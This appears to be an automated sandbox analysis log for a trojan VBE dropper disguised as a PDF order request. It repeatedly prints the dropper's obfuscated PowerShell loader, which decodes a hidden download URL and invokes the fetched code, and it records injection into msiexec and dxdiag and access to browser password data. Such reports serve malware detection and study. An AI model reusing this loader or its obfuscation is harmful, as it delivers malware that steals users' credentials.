                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(JomfruJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848CEB2762_2_00007FF848CEB276
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848CEC0222_2_00007FF848CEC022
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848DB994A2_2_00007FF848DB994A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_049DF3204_2_049DF320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_049DFBF04_2_049DFBF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_049DEFD84_2_049DEFD8
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 18_3_05F6ED9918_3_05F6ED99
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7271
                Source: unknownProcess created: Commandline size = 7271
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7271Jump to behavior
                Source: amsi32_6412.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3032, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@30/10@2/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Drgs.TrsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpbhzuw5.bia.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3032
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6412
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: dxdiag.exe, 00000012.00000003.2460155696.0000000021905000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeReversingLabs: Detection: 15%
                Source: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeVirustotal: Detection: 12%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(JomfruJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
